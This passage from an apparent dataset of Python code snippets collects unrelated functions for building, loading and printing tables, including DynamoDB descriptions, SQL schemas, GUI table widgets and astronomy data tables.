table.get('LocalSecondaryIndexes', []):\n for data in index['KeySchema']:\n if data['KeyType'] == 'RANGE':\n name = data['AttributeName']\n index_type = index['Projection']['ProjectionType']\n includes = index['Projection'].get('NonKeyAttributes')\n attrs[name] = attrs[name].to_index(index_type,\n index['IndexName'],\n includes)\n break\n global_indexes = {}\n for index in table.get('GlobalSecondaryIndexes', []):\n idx = GlobalIndex.from_description(index, attrs)\n global_indexes[idx.name] = idx\n return cls(table['TableName'], table['TableStatus'], attrs,\n global_indexes, throughput['ReadCapacityUnits'],\n throughput['WriteCapacityUnits'],\n throughput['NumberOfDecreasesToday'],\n table['TableSizeBytes'], table['ItemCount'],)", "def make_tables(self):\n for t in self.tables:\n self.add_table(groupname=t['groupname'],\n tablename=t['tablename'],\n description=t['description'],\n tabletitle=t['tabletitle'])", "def _initChoiceTable(self):\n\n t = self.tableWidget_choice_list # shorthand notation\n\n ### Header popluation & properties\n '''\n for (i, col_name) in enumerate(self.data.col_name_list):\n # Order the column labels as in the order of the definition\n # of the dictionary for the element property names and the\n # column names\n t.horizontalHeaderItem(i).setText(col_name)\n '''\n # or\n t.setHorizontalHeaderLabels(self.data.col_name_list)\n\n t.horizontalHeader().setMovable(True)", "def init_evtable(self, table):\n if table.height:\n # enforced height of each paged table, plus space for evmore extras\n self.height = table.height - 4\n\n # convert table to string\n text = str(table)\n self._justify = False\n self._justify_kwargs = None # enforce\n self.init_str(text)", "def __init__(self, flowchart=None, extension=None):\n logger.debug(\"Creating Table {}\".format(self))\n\n # Initialize our parent class\n super().__init__(\n flowchart=flowchart, title=\"Table\", extension=extension, 
logger=logger\n )\n\n # This needs to be after initializing subclasses...\n self.parameters = table_step.TableParameters()\n self.calls = 0", "def create_table(cls, *args, **kwargs):\n init = cls._meta.database.create_table_title(cls._meta.table_name)\n i = 1\n fields = zip(cls._meta.sorted_fields_names, cls._meta.sorted_fields)\n for field in fields:\n field_string = field[1].create_field(field[0])\n if i == len(fields):\n if cls._meta.unique:\n init = cls._meta.database.create_unique(init, cls._meta.unique)\n\n init = cls._meta.database.create_table_field_end(init, field_string)\n\n if cls._meta.hypertable:\n init = cls._meta.database.create_hypertable(init,\n cls._meta)\n else:\n init = cls._meta.database.create_table_field(init, field_string)\n i+=1\n\n yield cls._meta.database.runOperation(init)", "def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):\n\n identity_provider = NullIdentityProvider()\n\n token_address = scanned_distribution\n for sort_direction in [\"asc\", \"desc\"]:\n for sort_order in [\"address\", \"name\", \"balance\", \"updated\"]:\n generate_cap_table(\n logger,\n dbsession,\n token_address,\n order_by=sort_order,\n identity_provider=identity_provider,\n order_direction=sort_direction,\n include_empty=False,\n TokenScanStatus=TokenScanStatus,\n TokenHolderAccount=TokenHolderAccount,\n )", "def init_analysis_tables(self):\n cur = self.sql.cursor()\n cur.execute(\"PRAGMA foreign_keys = on\")\n cur.execute('''\n CREATE TABLE report_index (\n report_id INTEGER PRIMARY KEY AUTOINCREMENT,\n report_hash TEXT NOT NULL,\n device TEXT NOT NULL,\n timestamp INTEGER NOT NULL)''')\n cur.execute('''\n CREATE TABLE report_detail (\n route_id INTEGER PRIMARY KEY AUTOINCREMENT,\n report_hash TEXT NOT NULL,\n invalid TEXT NOT NULL,\n status TEXT NOT NULL,\n pfx TEXT NOT NULL,\n pfxlen TEXT NOT NULL,\n pfxstr_min TEXT NOT NULL,\n pfxstr_max TEXT NOT NULL,\n nexthop TEXT NOT NULL,\n metric TEXT NOT NULL,\n locpref TEXT NOT NULL,\n weight TEXT NOT NULL,\n pathbutone TEXT NOT NULL,\n orig_asn TEXT NOT NULL,\n route_orig TEXT NOT NULL)''')\n cur.execute('''\n CREATE TABLE fconstraints (\n fcons_id INTEGER PRIMARY KEY AUTOINCREMENT,\n route_id TEXT NOT NULL\n REFERENCES report_detail(route_id),\n host TEXT NOT NULL,\n port TEXT NOT NULL,\n asn TEXT NOT NULL,\n prefix TEXT NOT NULL,\n prefixlen INTEGER NOT NULL,\n max_prefixlen INTEGER NOT NULL)''')\n self.sql.commit()", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, 
CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __init__(self, engine: Engine, spec_id: int):\n\n self.engine = engine\n self.data = engine.get_spec(spec_id)\n assert self.data is not None\n\n # build the talent rows\n self.talent_rows = {}\n self.levels = {}\n for tier_data in self.data[\"talent_tiers\"]:\n # store talents as one-indexed\n talent_row = {}\n for talent_data in tier_data[\"talents\"]:\n ttip = talent_data[\"spell_tooltip\"]\n f_str = \"({}, {}) {}\".format(\n talent_data[\"talent\"][\"name\"],\n ttip[\"cast_time\"],\n ttip[\"description\"],\n )\n talent_row[talent_data[\"column_index\"] + 1] = {\n \"text\": f_str,\n \"raw\": talent_data,\n }\n\n # save tiers as one-indexed\n index = level_to_index(tier_data[\"level\"])\n self.talent_rows[index] = talent_row\n self.levels[index] = tier_data[\"level\"]\n\n # store this spec's talent macros\n self.macros = {}\n for row_idx, row_data in self.talent_rows.items():\n macro = build_row_macro(row_idx, row_data)\n if macro is not None:\n self.macros[row_idx] = macro\n\n self.name = self.data[\"name\"]\n\n # build a data structure for serialization\n media = engine.get_spec_media(spec_id)\n assert media is not None\n self.to_serialize = {\n \"icon\": media[\"assets\"][0][\"value\"],\n \"name\": self.name,\n \"slug\": self.name.lower().replace(\" \", \"_\"),\n \"role\": self.data[\"role\"][\"name\"],\n \"has_macros\": bool(self.macros),\n }\n self.to_serialize[\"talent_rows\"] = []\n for row, data in self.talent_rows.items():\n rdata: dict = {\n \"index\": row,\n \"level\": self.levels[row],\n \"macro\": None,\n }\n if row in self.macros:\n rdata[\"macro\"] = self.macros[row][0]\n rdata[\"macro_lines\"] = self.macros[row][1]\n rdata[\"talents\"] = {}\n for talent_idx, talent_data in data.items():\n 
tdata = Talent(\n self.engine, talent_data[\"raw\"][\"talent\"][\"id\"]\n ).to_serialize\n tdata[\"active\"] = is_talent_active(talent_data[\"raw\"])\n rdata[\"talents\"][talent_idx] = tdata\n self.to_serialize[\"talent_rows\"].append(rdata)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def test_create_table(self):\r\n function_name = sys._getframe().f_code.co_name\r\n db_name = \"{}_{}\".format(function_name, \"db\")\r\n db_name_illegal_by_rdb = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n db_name_illegal_by_this_program = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n table_name = \"{}_{}\".format(function_name, \"table\")\r\n table_name_illegal_by_rdb = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n table_name_illegal_by_this_program = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n\r\n test_list_1 = [\r\n db_name,\r\n table_name,\r\n None,\r\n None,\r\n None,\r\n None\r\n ]\r\n test_list_2 = [\r\n db_name,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_3 = [\r\n db_name,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n test_list_4 = [\r\n db_name_illegal_by_rdb,\r\n table_name,\r\n None\r\n ]\r\n test_list_5 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_6 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n test_list_7 = [\r\n db_name_illegal_by_this_program,\r\n table_name,\r\n None\r\n ]\r\n test_list_8 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_9 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n\r\n crd(self.c, test_list_1[0])\r\n test_list_1[len(test_list_1) - 1] = isinstance(\r\n crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0],\r\n True\r\n ),\r\n r.ast.TableCreate\r\n )\r\n test_list_1[len(test_list_1) - 2] = crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 3] = crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 4] = isinstance(\r\n crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0],\r\n True\r\n ),\r\n r.ast.TableCreate\r\n )\r\n dd(self.c, test_list_1[0])\r\n\r\n crd(self.c, test_list_2[0])\r\n \"\"\"Test 1.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_2[len(test_list_2) - 1] = crt(\r\n self.c,\r\n test_list_2[1],\r\n test_list_2[0]\r\n )\r\n dd(self.c, test_list_2[0])\r\n\r\n crd(self.c, test_list_3[0])\r\n \"\"\"Test 2.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_3[len(test_list_3) - 1] = crt(\r\n self.c,\r\n test_list_3[1],\r\n test_list_3[0]\r\n )\r\n dd(self.c, test_list_3[0])\r\n\r\n \"\"\"Test 3.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_4[len(test_list_4) - 1] = crt(\r\n self.c,\r\n test_list_4[1],\r\n test_list_4[0]\r\n )\r\n\r\n \"\"\"Test 4.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_5[len(test_list_5) - 1] = crt(\r\n self.c,\r\n test_list_5[1],\r\n test_list_5[0]\r\n )\r\n\r\n \"\"\"Test 5.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_6[len(test_list_6) - 1] = crt(\r\n self.c,\r\n test_list_6[1],\r\n test_list_6[0]\r\n )\r\n\r\n r.db_create(test_list_7[0]).run(self.c)\r\n \"\"\"Test 6.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_7[len(test_list_7) - 1] = crt(\r\n self.c,\r\n test_list_7[1],\r\n 
test_list_7[0]\r\n )\r\n r.db_drop(test_list_7[0]).run(self.c)\r\n\r\n r.db_create(test_list_8[0]).run(self.c)\r\n \"\"\"Test 7.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_8[len(test_list_8) - 1] = crt(\r\n self.c,\r\n test_list_8[1],\r\n test_list_8[0]\r\n )\r\n r.db_drop(test_list_8[0]).run(self.c)\r\n\r\n r.db_create(test_list_9[0]).run(self.c)\r\n \"\"\"Test 8.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_9[len(test_list_9) - 1] = crt(\r\n self.c,\r\n test_list_9[1],\r\n test_list_9[0]\r\n )\r\n r.db_drop(test_list_9[0]).run(self.c)\r\n\r\n self.assertTrue(test_list_1[len(test_list_1) - 1]) # Test 9.\r\n self.assertIsNotNone(test_list_1[len(test_list_1) - 2]) # Test 10.\r\n self.assertIsNone(test_list_1[len(test_list_1) - 3]) # Test 11.\r\n self.assertFalse(test_list_1[len(test_list_1) - 4]) # Test 12.\r\n self.assertIsNone(test_list_2[len(test_list_2) - 1]) # Test 13.\r\n self.assertIsNone(test_list_3[len(test_list_3) - 1]) # Test 14.\r\n self.assertIsNone(test_list_4[len(test_list_4) - 1]) # Test 15.\r\n self.assertIsNone(test_list_5[len(test_list_5) - 1]) # Test 16.\r\n self.assertIsNone(test_list_6[len(test_list_6) - 1]) # Test 17.\r\n self.assertIsNone(test_list_7[len(test_list_7) - 1]) # Test 18.\r\n self.assertIsNone(test_list_8[len(test_list_8) - 1]) # Test 19.\r\n self.assertIsNone(test_list_9[len(test_list_9) - 1]) # Test 20.\r", "def init_tables(database_url, _metadata, checkfirst=True):\n import dpds.storages.db.tables.operations\n import dpds.storages.db.tables.block\n import dpds.storages.db.tables.meta\n with isolated_nullpool_engine(database_url) as engine:\n _metadata.create_all(bind=engine, checkfirst=checkfirst)", "def startup(self):\n self.load_up_initial_db(TIMESTAMP_PARSE_DICT)\n self.add_numeric_cols()", "def fill_table(info):\n # extrac attributes from info struct\n data = info[\"data\"]\n table = info[\"table\"]\n header = info[\"header\"]\n row_num = info[\"row_num\"]\n\n currency_type_num = row_num - 1\n row_index = 0\n col_index = 0\n i = 0\n while i < len(data):\n if data[i].find(\"%\") > 0:\n # stat data\n while i < len(data) and row_index < currency_type_num:\n table[row_index+1].append(data[i])\n row_index += 1\n i += 1\n # Reset row_index\n row_index = 0\n else:\n if i < row_num - 1:\n # currency Type\n table[i+1].append(data[i])\n else:\n # time marker\n if data[i] != header:\n table[0].append(data[i])\n i += 1\n\n # End loop\n return None", "def construct_table(self):\n table_str = self.header_row\n row_lbls, col_lbls = self.get_idxvals()\n for r,rlbl in enumerate(row_lbls):\n row_data = [self.data[rlbl,clbl] for clbl in col_lbls]\n table_str += self.construct_row(r, row_data)\n \n return table_str", "def __init__(self, **kwargs):\n TableLoader.__init__(self, **kwargs)\n \n self._top_level_categories_ = ['Mathematics',\n 'People',\n 'Science',\n 'Law',\n 'History',\n 'Culture',\n 'Politics',\n 'Technology',\n 'Education',\n 'Health',\n 'Business',\n 'Belief',\n 'Humanities',\n 'Society',\n 'Life',\n 'Environment',\n 'Computers',\n 'Arts',\n 'Language',\n 'Places']", "def add_run_length_encoding_table(self, tag, line, rows, columns, row_labels=None, underline=False):\n if row_labels:\n columns += 1\n\n with tag(\"table\"):\n with tag(\"tbody\"):\n for row_index in range(rows):\n with tag(\"tr\"):\n for column_index in range(columns):\n line(\"td\", \"\", klass=\"bordered-cell\")\n if row_labels and row_index < len(row_labels):\n line(\"td\", row_labels[row_index], klass=\"label-cell\")\n if underline:\n line(\"td\", \"\", 
klass=\"padding-cell\")\n line(\"td\", \"\", klass=\"underline-cell\")", "def create_tables (cls, env=os.environ):\n\n cur = cls.pri_table_read_cursor (env=env)\n cur.execute ('SPECIALCASE gettablelist')\n ret = cur.fetchall ()\n \n existingtables = set ([x[0].lower() for x in ret])\n\n for tabname in (set (cls.table_desc.keys ()) - existingtables):\n sql, lsd = cls.table_desc[tabname]\n epls, desls, sqlprefix = lsd.get_create_labeling (savels=True)\n\n conn = get_labeled_conn (epls, desls)\n cur = conn.cursor ()\n cur.execute (sql)\n conn.close ()\n lsd.pop_labelset ()\n\n \n import psycopg2\n for sql in cls.sql_createindex:\n conn = get_labeled_conn ()\n cur = conn.cursor ()\n # XXX It would be better to check which indices exist as we do for tables.\n try:\n cur.execute (sql)\n except psycopg2.ProgrammingError, e: \n pass\n conn.close ()", "def __init__(self, dim, connections_per_row=3):\n _table.STable_swiginit(self, _table.new_STable(dim, connections_per_row))", "def __init__(self):\n _snap.TTableRow_swiginit(self, _snap.new_TTableRow())", "def __init__(self, tabletext=\"\"):\n\n # Table attributes\n self.__title = \"\"\n self.__type = \"GRAPHS\" # Default to GRAPHS\n self.__graphs = \"\"\n self.__columns = \"\"\n self.__text = \"\"\n self.__data = \"\"\n # Derived data\n self.__graph_list = []\n self.__column_list = []\n # Indicate the the object has been populated\n self.__table_parse_error = False\n self.__nonzero = False\n # The \"raw\" table data from the log file\n self.__rawtable = \"\"\n # Attempt to populate the table\n if tabletext:\n self.__rawtable = tabletext\n if not self.__buildtable(tabletext):\n # Failed to extract table\n # If it could be a title then use this\n # instead\n if str(tabletext).count(\"\\n\") == 0:\n self.settitle(tabletext)", "def load_table(self, fpath, string, dom, mmap, step_length=None):\n single_dom_spec = True\n if isinstance(string, basestring):\n string = string.strip().lower()\n if string == 'ic':\n string = STR_IC\n elif string == 'dc':\n string = STR_DC\n elif string == 'all':\n string = STR_ALL\n else:\n raise ValueError('Unhandled string \"{}\"'.format(string))\n agg_mode = AGG_STR_ALL if string is STR_ALL else AGG_STR_SUBDET\n if self.string_aggregation is None:\n self.string_aggregation = agg_mode\n assert agg_mode == self.string_aggregation\n single_dom_spec = False\n else:\n if self.string_aggregation is None:\n self.string_aggregation = False\n # `False` is ok but `None` is not ok\n assert self.string_aggregation == False # pylint: disable=singleton-comparison\n assert 1 <= string <= 86\n\n if isinstance(dom, basestring):\n dom = dom.strip().lower()\n assert dom == 'all'\n dom = DOM_ALL\n if self.depth_aggregation is None:\n self.depth_aggregation = True\n assert self.depth_aggregation\n single_dom_spec = False\n else:\n if self.depth_aggregation is None:\n self.depth_aggregation = False\n # `False` is ok but `None` is not ok\n assert self.depth_aggregation == False # pylint: disable=singleton-comparison\n assert 1 <= dom <= 60\n\n if single_dom_spec and not self.operational_doms[string - 1, dom - 1]:\n print(\n 'WARNING: String {}, DOM {} is not operational, skipping'\n ' loading the corresponding table'.format(string, dom)\n )\n return\n\n table = self.table_loader_func(fpath=fpath, mmap=mmap)\n if 'step_length' in table:\n if step_length is None:\n step_length = table['step_length']\n else:\n assert step_length == table['step_length']\n else:\n assert step_length is not None\n table['step_length'] = step_length\n\n table_norm, 
t_indep_table_norm = get_table_norm(\n avg_angsens=self.avg_angsens,\n quantum_efficiency=1,\n norm_version=self.norm_version,\n **{k: table[k] for k in TABLE_NORM_KEYS}\n )\n table['table_norm'] = table_norm\n table['t_indep_table_norm'] = t_indep_table_norm\n\n pexp_5d, pexp_meta = generate_pexp_5d_function(\n table=table,\n table_kind=self.table_kind,\n compute_t_indep_exp=self.compute_t_indep_exp,\n use_directionality=self.use_directionality,\n num_phi_samples=self.num_phi_samples,\n ckv_sigma_deg=self.ckv_sigma_deg\n )\n if self.pexp_func is None:\n self.pexp_func = pexp_5d\n self.pexp_meta = pexp_meta\n elif pexp_meta != self.pexp_meta:\n raise ValueError(\n 'All binnings and table parameters currently must be equal to'\n ' one another.'\n )\n\n table_tup = (\n table[self.table_name][self.usable_table_slice],\n table['table_norm'],\n )\n\n if self.tbl_is_templ_compr:\n table_tup += (table['table_map'],)\n\n if self.compute_t_indep_exp:\n table_tup += (\n table[self.t_indep_table_name],\n table['t_indep_table_norm']\n )\n if self.tbl_is_templ_compr:\n table_tup += (table['t_indep_table_map'],)\n\n self.tables[(string, dom)] = table_tup", "def _populate(self):\n\n # Assume the first word is what we want, and we can find well formed years\n # This sucks, but will work for these ones.\n # Roll on bibtex for citations in the CIM.\n\n citation_detail = self.doc.citation_detail\n author = citation_detail.split(',')[0]\n match = '([^\\w])19|20\\d\\d([^\\w])*?'\n m = re.search(match, citation_detail)\n if m:\n year = m.group(0)\n else:\n year = None\n\n # one error in existing es-doc content to be fixed:\n if 'van Vuuren DP' in author:\n author = 'van Vuuren'\n print 'applying vv fix'\n\n self.year = int(year)\n\n # We assume that this table will have entries which ne\n\n # I use the first three letters of a an authors name, and for\n # three or more authors, EA, and then the year for my bibtex citation string\n self.citeguess = author[0:3] + 'EA' + year[2:]\n # This is what will appear in the table:\n self.citestring = '%s et al. 
(%s)' % (author, year)\n # Keep this for a reference list for checking against the eventual bibtex reference list.\n self.text = citation_detail", "def create_tables(self):\n for name, attribute in self.__dict__.items():\n if hasattr(attribute, 'create_table_in_sqlite_db'):\n attribute.create_table_in_sqlite_db()", "def _buildtable(self):\n\n tabrows = []\n\n for i, (expid, exfiles) in enumerate(self._exposure_files.items()):\n specflux_b, specflux_r, specflux_z = [], [], []\n tab = None\n\n if len(exfiles) == 0:\n continue\n\n print(expid)\n for exfile in exfiles:\n print(exfile)\n hdu = fits.open(exfile)\n\n # The following tables are present in the redux sframes and the\n # nightwatch qcframes.\n wave = hdu['WAVELENGTH'].data\n\n # However, in the nightwatch files the wavelength data are a\n # table of size nfiber x nwavelength.\n if self._filetype == 'nightwatch':\n if wave.ndim > 1:\n wave = wave[0]\n\n fluxhead = hdu['FLUX'].header\n fluxdata = hdu['FLUX'].data\n ivardata = hdu['IVAR'].data\n fibermap = hdu['FIBERMAP'].data\n exptime = fluxhead['EXPTIME']\n if not np.all(self._unditherfa['FIBER'] ==\n np.arange(len(self._unditherfa))):\n raise ValueError('weird fiberassign file format!')\n fibermap = self._unditherfa[fibermap['FIBER']]\n\n target_id = fibermap['TARGETID']\n target_ra = fibermap['TARGET_RA']\n target_dec = fibermap['TARGET_DEC']\n fiber = fibermap['FIBER']\n objtype = fibermap['OBJTYPE']\n flux_g = fibermap['FLUX_G']\n flux_r = fibermap['FLUX_R']\n flux_z = fibermap['FLUX_Z']\n x, y = [fibermap['FIBERASSIGN_{}'.format(val)] for val in ('X', 'Y')]\n\n camera = fluxhead['CAMERA'][0].upper()\n\n if getattr(self, '_deltara', None) is not None:\n dra = self._deltara[i]*np.ones(len(fiber))\n ddec = self._deltadec[i]*np.ones(len(fiber))\n elif self._dithertype == 'telescope':\n dithra = self._ditherfa['target_ra']\n dithdec = self._ditherfa['target_dec']\n udithra = self._unditherfa['target_ra']\n udithdec = self._unditherfa['target_dec']\n ontarget = ((self._ditherfa['targetid'] ==\n self._unditherfa['targetid']) &\n (self._ditherfa['objtype'] == 'TGT'))\n dfiberra = (dithra-udithra)*np.cos(np.radians(udithdec))*60*60\n dfiberdec = (dithdec-udithdec)*60*60\n if not np.all(self._ditherfa['FIBER'] ==\n np.arange(len(self._ditherfa))):\n raise ValueError('unexpected shape of dither file')\n dfiberra[~ontarget] = np.nan\n dfiberdec[~ontarget] = np.nan\n dfiberra = dfiberra[fiber]\n dfiberdec = dfiberdec[fiber]\n wcs = self.lookup_wcs(fluxhead['MJD-OBS'])\n centralwcs = self._central_wcs\n if (~np.isfinite(centralwcs['cenra'][1]) or\n ~np.isfinite(centralwcs['cendec'][1])):\n raise ValueError('central pointing ra/dec is NaN!')\n dtelra = (wcs['cenra'][1]-centralwcs['cenra'][1])\n dtelra *= np.cos(np.radians(centralwcs['cendec'][1]))\n dteldec = wcs['cendec'][1]-centralwcs['cendec'][1]\n dra = dfiberra + dtelra*60*60\n ddec = dfiberdec + dteldec*60*60\n if np.all(~np.isfinite(dra)):\n print('warning: no good telescope offset for %s' %\n exfile)\n else:\n raise ValueError('not implemented')\n \n for j, fiber_id in enumerate(fiber):\n flux = fluxdata[j]\n ivar = ivardata[j]\n if not np.any(ivar > 0):\n specflux = 0\n specflux_ivar = 0\n else:\n meanivar = np.mean(ivar[ivar > 0])\n mask = ivar > meanivar / 100\n specflux = np.trapz(flux*mask, wave)\n specflux_ivar = 1./np.sum(ivar[mask]**-1)\n # Schlegel: sum over correct wavelengths, all three\n # filters, plus 11 pixel median filter to reject\n # cosmics.\n # will require being better about reading in\n # the spectrographs 
together.\n tabrows.append((expid, exptime,\n target_id[j], target_ra[j], target_dec[j],\n fiber[j], objtype[j],\n flux_g[j], flux_r[j], flux_z[j],\n specflux, specflux_ivar, camera,\n dra[j], ddec[j],\n x[j], y[j]))\n\n tab = Table(rows=tabrows,\n names=('EXPID', 'EXPTIME',\n 'TARGETID', 'TARGET_RA', 'TARGET_DEC',\n 'FIBER', 'OBJTYPE',\n 'FLUX_G', 'FLUX_R', 'FLUX_Z',\n 'SPECTROFLUX', 'SPECTROFLUX_IVAR', 'CAMERA',\n 'DELTA_X_ARCSEC', 'DELTA_Y_ARCSEC',\n 'XFOCAL', 'YFOCAL'),\n meta={'EXTNAME' : 'DITHER',\n 'TILEID' : '{}'.format(self._tileid)})\n\n return tab", "def descr2tabledef(descr, table_type='binary', write_bitcols=False):\n names = []\n formats = []\n dims = []\n\n for d in descr:\n\n \"\"\"\n npy_dtype = d[1][1:]\n if is_ascii and npy_dtype in ['u1','i1']:\n raise ValueError(\"1-byte integers are not supported for \"\n \"ascii tables\")\n \"\"\"\n\n if d[1][1] == 'O':\n raise ValueError(\n 'cannot automatically declare a var column without '\n 'some data to determine max len')\n\n name, form, dim = _npy2fits(\n d, table_type=table_type, write_bitcols=write_bitcols)\n\n if name == '':\n raise ValueError(\"field name is an empty string\")\n\n \"\"\"\n if is_ascii:\n if dim is not None:\n raise ValueError(\"array columns are not supported \"\n \"for ascii tables\")\n \"\"\"\n\n names.append(name)\n formats.append(form)\n dims.append(dim)\n\n return names, formats, dims", "def _parse_initsol(self) :\n\t\tlogging.debug(\"Parsing initsol initial solution\")\n\n\t\t# Init initsol as an empty dict\n\t\tself.initsol = {}\n\n\t\tfor varname in ['alpha','beta','g','h'] : \n\t\t\tself._parse_var_initsol(varname)", "def _processSpec(self, spec):\n if isinstance(spec, list):\n for k in spec:\n if isinstance(k, Specifier):\n self._spec.append(k)\n else:\n raise NotAValidSpecifierError(str(type(k)))\n elif isinstance(spec, Specifier):\n self._spec.append(spec)\n else:\n # This point we need to go to the symboltable\n # and look for structs and unions.\n raise NotAValidSpecifierError(str(type(spec)))", "def create_Ih_table(\n experiments, reflections, selections=None, n_blocks=1, anomalous=False\n):\n if selections:\n assert len(selections) == len(\n reflections\n ), \"\"\"Must have an equal number of\n reflection tables and selections in the input lists.\"\"\"\n space_group_0 = experiments[0].crystal.get_space_group()\n for experiment in experiments:\n assert (\n experiment.crystal.get_space_group() == space_group_0\n ), \"\"\"The space\n groups of all experiments must be equal.\"\"\"\n input_tables = []\n indices_lists = []\n for i, reflection in enumerate(reflections):\n if \"inverse_scale_factor\" not in reflection:\n reflection[\"inverse_scale_factor\"] = flex.double(reflection.size(), 1.0)\n if selections:\n input_tables.append(reflection.select(selections[i]))\n indices_lists.append(selections[i].iselection())\n else:\n input_tables.append(reflection)\n indices_lists = None\n Ih_table = IhTable(\n input_tables,\n space_group_0,\n indices_lists,\n nblocks=n_blocks,\n anomalous=anomalous,\n )\n return Ih_table", "def create_tabular_resources(self, file, skip_lines, encoding):\n engine = Engine()\n self.encoding = encoding\n engine.encoding = encoding\n table_val = Table(str(file), header_rows=skip_lines)\n table = engine.auto_create_table(table_val, filename=file, make=False)\n clean_table = table.__dict__\n resource_dict = {}\n path_to_table = os.path.basename(clean_table[\"name\"])\n print(\"Processing... 
{file_name}\".format(file_name=path_to_table))\n r_name = os.path.splitext(path_to_table)[0].lower()\n resource_dict[\"name\"] = clean_table_name(r_name)\n resource_dict[\"path\"] = path_to_table\n resource_dict[\"schema\"] = {}\n resource_dict[\"dialect\"] = {\"delimiter\": \",\"}\n resource_dict[\"schema\"][\"fields\"] = []\n for cname, ctuple in clean_table[\"columns\"]:\n if len(ctuple) >= 2:\n if ctuple[0] == \"char\":\n # char sizes need quotes\n char_size = \"{a}\".format(a=ctuple[1])\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0],\n \"size\": char_size\n })\n else:\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0],\n \"size\": ctuple[1]\n })\n else:\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0]\n })\n resource_dict[\"url\"] = \"fill\"\n return resource_dict", "def __init__(self, factory, con, name, cols=[]) :\n\n logging.getLogger('main').info('Creating table %s', name)\n\n super().__init__(name)\n self.factory = factory\n self.con = con\n self._extend_cols([('__ROWID', 'INTEGER')])\n self._extend_cols(cols)\n self.row_id = 0\n\n self._create_table()", "def _build_micro_tree_tables(self):\n # A 